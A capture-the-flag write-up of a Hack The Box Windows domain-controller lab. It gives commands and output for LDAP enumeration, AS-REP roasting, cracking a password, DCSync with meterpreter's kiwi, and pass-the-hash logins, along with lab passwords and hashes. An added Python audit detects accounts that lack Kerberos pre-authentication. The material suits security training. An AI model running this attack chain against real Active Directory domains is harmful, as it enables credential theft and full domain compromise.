Basic information

Lab URL: https://www.hackthebox.eu/home/machines/profile/229

  • 10.10.10.175

Port scan

80

389

Port 389 is LDAP; scan it in more detail with nmap's ldap* scripts:

```
nmap -n -sV -script "ldap*" -p 389 10.10.10.175
```

From the results, the domain should be EGOTISTICAL-BANK.LOCAL.

Username wordlist

From the information on the site's About page, generate a username wordlist:

```
fsmith
hbear
skerb
scoins
btaylor
sdriver
```

GetNPUsers

https://github.com/SecureAuthCorp/impacket/blob/master/examples/GetNPUsers.py

Using this script together with the username wordlist above, we obtain a valid TGT (an AS-REP hash for one of the users):

```
python GetNPUsers.py EGOTISTICAL-BANK.LOCAL/ -usersfile user.txt -outputfile hash.txt -dc-ip 10.10.10.175

cat hash.txt
$krb5asrep$23$fsmith@EGOTISTICAL-BANK.LOCAL:23e093d0dbeb39c9f9ca834a989c73e8$6e4bd269f8fe18d739cd032667f1683073a95b544511fb6f4f98df848a973e46a6724be00b8c94511b41aa8622d8a5a5a353fb21090c00d4797950268504f7b6b0957d38406a561a789820dec215a3d9ce3ed8f3cb5707329314fccd14f1380a5bb5298bb1ae85cab124615349b8117e0cc3f617d6f9f6327c0ef073e5b536796fde87567c377d13c8978dd6f2c62dd3424f20e86b58633196332e76656c6866f5127b23c73fc87df1815948d383fbd5c51e5431581f1bd5cc0a80fbee29d2eb51c7c2b6b2ff8f4284f5f5d4616dea2afca926c6e1282dad539b80879c628bb29d936a42e8341be0a100ae109175db32343fac9478717ba76a97bf4025cba13d
```

The password can be cracked from this hash (John the Ripper, which ships with Kali, is recommended):

```
fsmith : Thestrokes23
```
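What GetNPUsers finds is an account whose userAccountControl has the "Kerberos pre-authentication not required" bit set, which is the condition that makes the AS-REP crackable offline. The following is an added example, not code from the original writeup, that audits LDIF-style user records (constructed sample data, with account names only borrowed from the wordlist above) for that flag so the exposure can be found and removed on the defending side.

```python
# Added example: audit user records for the ADS_UF_DONT_REQUIRE_PREAUTH flag.
# The LDIF sample below is constructed; it mirrors the shape `ldapsearch`
# prints for user objects but the values are not from the real box.

UF_ACCOUNTDISABLE = 0x2
UF_DONT_REQUIRE_PREAUTH = 0x400000  # ADS_UF_DONT_REQUIRE_PREAUTH

SAMPLE_LDIF = """\
dn: CN=fsmith,CN=Users,DC=EGOTISTICAL-BANK,DC=LOCAL
sAMAccountName: fsmith
userAccountControl: 4260352

dn: CN=hbear,CN=Users,DC=EGOTISTICAL-BANK,DC=LOCAL
sAMAccountName: hbear
userAccountControl: 66048

dn: CN=oldsvc,CN=Users,DC=EGOTISTICAL-BANK,DC=LOCAL
sAMAccountName: oldsvc
userAccountControl: 4260354
"""


def parse_ldif(text):
    """Yield one dict per LDIF record; records are separated by blank lines."""
    record = {}
    for line in text.splitlines():
        if not line.strip():
            if record:
                yield record
            record = {}
            continue
        key, _, value = line.partition(":")
        record[key.strip()] = value.strip()
    if record:
        yield record


def asrep_roastable(text):
    """Return sAMAccountNames of enabled accounts that do not require pre-auth.

    A disabled account (UF_ACCOUNTDISABLE set) is skipped: the KDC will not
    issue an AS-REP for it, so it is not exposed even with the flag set.
    """
    hits = []
    for rec in parse_ldif(text):
        uac = int(rec.get("userAccountControl", "0"))
        if uac & UF_DONT_REQUIRE_PREAUTH and not uac & UF_ACCOUNTDISABLE:
            hits.append(rec["sAMAccountName"])
    return hits


if __name__ == "__main__":
    for name in asrep_roastable(SAMPLE_LDIF):
        print(f"[!] {name}: Kerberos pre-authentication not required")
```

Clearing the flag in the account's properties ("Do not require Kerberos preauthentication") removes the condition; 4260352 decodes to NORMAL_ACCOUNT | DONT_EXPIRE_PASSWORD | DONT_REQUIRE_PREAUTH.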

user flag

Log in with this username and password using evil-winrm; user.txt is on the Desktop:

Gathering privilege-escalation information

https://github.com/carlospolop/privilege-escalation-awesome-scripts-suite/blob/master/winPEAS/winPEASexe/winPEAS/bin/x64/Release/winPEAS.exe

Files can be uploaded directly from within evil-winrm:

```
upload winPEAS.exe
```

```
[+] Looking for AutoLogon credentials(T1012)
Some AutoLogon credentials were found!!
DefaultDomainName : EGOTISTICALBANK
DefaultUserName : EGOTISTICALBANK\svc_loanmanager
DefaultPassword : Moneymakestheworldgoround!

*Evil-WinRM* PS C:\Users\FSmith\desktop> net user

User accounts for \\

-------------------------------------------------------------------------------
Administrator FSmith Guest
HSmith krbtgt svc_loanmgr
The command completed with one or more errors.
```

So the password of svc_loanmgr should be Moneymakestheworldgoround!, but this account does not have Administrator privileges either.

DCSync

Execute a command through evil-winrm to load a meterpreter session, then:

```
load kiwi
dcsync Administrator
```

This gives us the Administrator's NTLM hash.

Pass-the-hash to get root

There is no need to crack the hash; log in directly with pass-the-hash (PTH):

```
evil-winrm -i 10.10.10.175 -u Administrator -H 'd9485863c1e9e05851aa40cbb4ab9dff'

# -H, --hash NTHash NTHash
```

This yields root.txt:

References